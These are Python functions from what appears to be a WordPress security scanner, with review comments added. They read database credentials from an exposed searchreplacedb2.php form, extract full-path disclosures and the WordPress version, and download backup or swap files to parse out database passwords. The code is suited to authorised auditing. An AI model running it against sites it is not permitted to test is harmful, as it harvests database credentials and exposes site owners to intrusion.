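def passive(target):
    """Check whether searchreplacedb2.php is reachable and read its pre-filled form.

    Two requests are made through ``Core.get_web_page``: one for the script
    itself (matched on its ``<title>``), then one for ``?step=2`` with
    ``loadwp=1``. The form fields named ``host``, ``data``, ``user`` and
    ``pass`` are read from the second response, which is why leaving this
    maintenance script on a server exposes the database settings to anyone
    who can request it.

    Args:
        target: object whose ``url`` attribute is the site base URL.

    Returns:
        A list of ``(Convention key, value)`` tuples; empty when the script
        was not found. The ``c.DB_Password`` entry holds the password in
        clear text, so callers should keep the list out of logs and reports
        that are not access-controlled.
    """
    url = target.url
    # NOTE(review): no separator is added, so target.url presumably ends
    # with "/" - confirm against the caller.
    url += "searchreplacedb2.php"
    c = Convention()
    retvalue = []

    # `search` presumably makes `found` true only when the title is present
    # in the body - confirm in Core.get_web_page.
    found, html = Core.get_web_page(url, search="<title>Search and replace DB.</title>")
    if not found:
        return retvalue

    log.success('Search&Replace is at \x1B[31m'+url+"\x1B[0m")
    url += "?step=2"
    values = {'loadwp': 1}
    found, html = Core.get_web_page(url, values=values)
    if found:
        # Same order as the original chain of checks: host, data, user, pass.
        fields = (
            ('name="host"', c.DB_Host),
            ('name="data"', c.DB_Name),
            ('name="user"', c.DB_User),
            ('name="pass"', c.DB_Password),
        )
        for line in html.split('\n'):
            pieces = line.split('"')
            for marker, key in fields:
                if marker not in line:
                    continue
                # The value is taken from the tenth quote-delimited piece.
                # A line with a different attribute layout used to raise
                # IndexError and discard everything collected so far; it is
                # skipped instead.
                if len(pieces) > 9:
                    retvalue.append((key, pieces[9]))

    # NOTE(review): the source arrived with its indentation collapsed; the
    # presence flag is assumed to be set whenever the script itself was
    # found, whether or not step 2 could be read - confirm.
    retvalue.append((c.sdb2, "True"))
    return retvalue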
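def passive(target):
    """Look for a full path disclosure in /wp-includes/rss-functions.php.

    The page is fetched through ``Core.get_web_page`` and each line that
    contains ``() in <b>`` is treated as an error message; the text between
    that marker and the following ``wp-includes`` is recorded as the
    installation path. A server that prints such messages is showing PHP
    errors to visitors.

    Args:
        target: object whose ``url`` attribute is the site base URL.

    Returns:
        A list of ``(c.Full_Path, path)`` tuples, or ``[('none', False)]``
        when no path was extracted.
    """
    url = target.url
    c = Convention()
    retValue = []
    url += "/wp-includes/rss-functions.php"

    found, html = Core.get_web_page(url)
    if found:
        # Logged before any line is inspected, hence the "may have" wording.
        log.info('[RSS Full Path] May have found Full Path Disclosure')
        marker = '() in <b>'
        for line in html.split('\n'):
            beg = line.find(marker)
            if beg == -1:
                continue
            beg += len(marker)
            # Search only after the marker. The original searched the whole
            # line and sliced with the raw result, so a line without
            # "wp-includes" gave end == -1 and recorded the rest of the line
            # minus its last character as a path.
            end = line.find("wp-includes", beg)
            if end == -1:
                continue
            retValue.append((c.Full_Path, line[beg:end]))

    # NOTE(review): the source arrived with its indentation collapsed; the
    # fallback is assumed to apply to a failed fetch as well - confirm.
    if not retValue:
        retValue = [('none', False)]
    return retValue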
def passive(target):
    """Read the WordPress version from the site's readme.html.

    The page is requested through ``Core.get_web_page`` with the search
    string ``<br /> Version``. On every line containing that string, the
    last space-separated token is taken as the version; if several lines
    match, the last one wins.

    Args:
        target: object whose ``url`` attribute is the site base URL.

    Returns:
        ``[(c.WP_Version, version)]`` when a version was read, else ``[]``.
    """
    c = Convention()
    # NOTE(review): no separator is added, so target.url presumably ends
    # with "/" - confirm against the caller.
    url = target.url + "readme.html"
    version = False

    found, html = Core.get_web_page(url, search='<br /> Version')
    if found:
        for line in html.split('\n'):
            if '<br /> Version' in line:
                version = line.split('\x20')[-1]

    # NOTE(review): the source arrived with its indentation collapsed; the
    # failure message is assumed to be logged for a failed fetch as well.
    # An empty last token (a line ending in a space) also counts as failure.
    if version:
        return [(c.WP_Version, version)]
    log.failure("[Version] Wasn't able to read "+url)
    return []
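def request_worker(url):
    """Fetch *url* and, if it returns a non-empty body, save it under ./output.

    The body is written to ``<cwd>/output/<url with "/" replaced by "_">``.
    When it contains the text ``DB_`` it is also passed to
    ``Core.parse_config_file`` and the parsed items are appended to the
    module-level ``swap_found`` list.

    Changes from the original:
      * the output directory is created without an exists-then-create race
        (the function name suggests it runs in several workers at once -
        confirm);
      * the file is created with mode 0o600, because a saved configuration
        backup can contain database credentials (the mode applies only when
        the file is newly created, and only where the platform honours it);
      * the file is closed even if the write fails.

    Args:
        url: full URL of the candidate backup or swap file.
    """
    global swap_found
    status, content = Core.get_web_page(url)
    if not status or len(content) == 0:
        return

    directory = os.getcwd()+"/output"
    try:
        os.makedirs(directory)
    except OSError:
        # Already present, possibly created by another worker a moment ago;
        # anything else is a real error.
        if not os.path.isdir(directory):
            raise

    # Replacing "/" keeps the saved name inside the output directory.
    file_name = url.replace('/', '_')
    path = directory+'/'+file_name
    log.success("[Swap] Found backup or swap and saving it as \x1B[92m"+directory+'/'+file_name+"\x1B[0m")

    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w') as f:
        f.write(content)

    if "DB_" in content:
        swap_found.extend(Core.parse_config_file(content))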
def hostUp(self):
    """Return the status flag from fetching the target's base URL.

    The page body returned by ``Core.get_web_page`` is discarded; only the
    first element of the result is passed back to the caller.
    """
    reachable, _body = Core.get_web_page(self.target.url)
    return reachable